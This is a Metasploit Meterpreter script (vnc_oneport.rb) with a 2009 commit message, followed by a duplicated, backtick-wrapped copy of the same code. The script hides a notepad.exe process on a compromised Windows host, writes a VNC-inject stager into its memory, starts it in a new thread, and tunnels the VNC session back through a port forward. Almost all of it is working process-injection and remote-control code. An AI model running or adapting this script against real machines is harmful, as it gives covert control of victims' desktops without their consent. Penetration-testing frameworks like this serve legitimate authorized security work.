metasploit-framework/scripts/meterpreter/vnc_oneport.rb

# $Id$

#
# Meterpreter script for obtaining a quick VNC session
#

session = client

#
# Options
#
opts = Rex::Parser::Arguments.new(
	"-h"  => [ false,  "This help menu"],
	"-p"  => [ true,   "The port on the remote host to bind VNC to (default: randomized)"],
	"-l"  => [ true,   "The local port to listen on via port forwarding (default: 5901)"],
	"-e"  => [true,    "The process to run and inject into (default: notepad.exe)"]
)

#
# Default parameters
#

lport = 5901
lhost = "127.0.0.1"
rport = 1024 + rand(1024)
runme = "notepad.exe"

#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
	case opt
	when "-h"
		print_line(opts.usage)
		return
	when "-p"
		rport = val.to_i
	when "-l"
		lport = val.to_i
	when "-e"
		runme = val
	end
end


#
# Create Payload
#
print_status("Creating a VNC stager: RHOST=#{lhost} LPORT=#{rport}")
pay = client.framework.payloads.create("windows/vncinject/bind_tcp")
pay.datastore['LPORT'] = rport
# pay.datastore['RHOST'] = vnc_lhost
raw  = pay.generate

#
# Create a host process
#
pid = client.sys.process.execute("#{runme}", nil, {'Hidden' => 'true'}).pid
print_status("Host process #{runme} has PID #{pid}")
note = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
mem  = note.memory.allocate(1024*32)

print_status("Allocated memory at address #{"0x%.8x" % mem}")
print_status("Writing the VNC stager into memory...")
note.memory.write(mem, raw)

#
# Setup the multi/handler
#

mul = session.framework.exploits.create("multi/handler")
mul.datastore['PAYLOAD']   = "windows/vncinject/bind_tcp"
mul.datastore['RHOST']    = lhost
mul.datastore['LPORT']    = lport
mul.datastore['EXITFUNC']  = 'process'
mul.datastore['ExitOnSession'] = true
print_status("Running Payload")
mul.exploit_simple(
	'Payload'        => mul.datastore['PAYLOAD'],
	'RunAsJob'       => true
)

print_status("Creating a new thread within #{runme} to run the VNC stager...")
note.thread.create(mem, 0)

print_status("Starting the port forwarding from #{lport} => TARGET:#{rport}")
client.run_cmd("portfwd add -l #{lport} -p #{rport} -r #{lhost}")
Merges in mubix's VNC script (uses pivoting to keep all comms over the main session). Adds the -f parameter to the migrate command to indicate that a new process should be created always git-svn-id: file:///home/svn/framework3/trunk@7872 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 05:10:33 +00:00			`# $Id$`

			`#`
			`# Meterpreter script for obtaining a quick VNC session`
			`#`

			`session = client`

			`#`
			`# Options`
			`#`
			`opts = Rex::Parser::Arguments.new(`
			`"-h" => [ false, "This help menu"],`
			`"-p" => [ true, "The port on the remote host to bind VNC to (default: randomized)"],`
			`"-l" => [ true, "The local port to listen on via port forwarding (default: 5901)"],`
			`"-e" => [true, "The process to run and inject into (default: notepad.exe)"]`
			`)`

			`#`
			`# Default parameters`
			`#`

			`lport = 5901`
			`lhost = "127.0.0.1"`
			`rport = 1024 + rand(1024)`
			`runme = "notepad.exe"`

			`#`
			`# Option parsing`
			`#`
			`opts.parse(args) do \|opt, idx, val\|`
			`case opt`
			`when "-h"`
			`print_line(opts.usage)`
			`return`
			`when "-p"`
			`rport = val.to_i`
			`when "-l"`
			`lport = val.to_i`
			`when "-e"`
			`runme = val`
			`end`
			`end`


			`#`
			`# Create Payload`
			`#`
			`print_status("Creating a VNC stager: RHOST=#{lhost} LPORT=#{rport}")`
			`pay = client.framework.payloads.create("windows/vncinject/bind_tcp")`
			`pay.datastore['LPORT'] = rport`
			`# pay.datastore['RHOST'] = vnc_lhost`
			`raw = pay.generate`

			`#`
			`# Create a host process`
			`#`
			`pid = client.sys.process.execute("#{runme}", nil, {'Hidden' => 'true'}).pid`
			`print_status("Host process #{runme} has PID #{pid}")`
			`note = client.sys.process.open(pid, PROCESS_ALL_ACCESS)`
			`mem = note.memory.allocate(1024*32)`

			`print_status("Allocated memory at address #{"0x%.8x" % mem}")`
			`print_status("Writing the VNC stager into memory...")`
			`note.memory.write(mem, raw)`

			`#`
			`# Setup the multi/handler`
			`#`

			`mul = session.framework.exploits.create("multi/handler")`
			`mul.datastore['PAYLOAD'] = "windows/vncinject/bind_tcp"`
			`mul.datastore['RHOST'] = lhost`
			`mul.datastore['LPORT'] = lport`
			`mul.datastore['EXITFUNC'] = 'process'`
			`mul.datastore['ExitOnSession'] = true`
			`print_status("Running Payload")`
			`mul.exploit_simple(`
			`'Payload' => mul.datastore['PAYLOAD'],`
			`'RunAsJob' => true`
			`)`

			`print_status("Creating a new thread within #{runme} to run the VNC stager...")`
			`note.thread.create(mem, 0)`

			`print_status("Starting the port forwarding from #{lport} => TARGET:#{rport}")`
			`client.run_cmd("portfwd add -l #{lport} -p #{rport} -r #{lhost}")`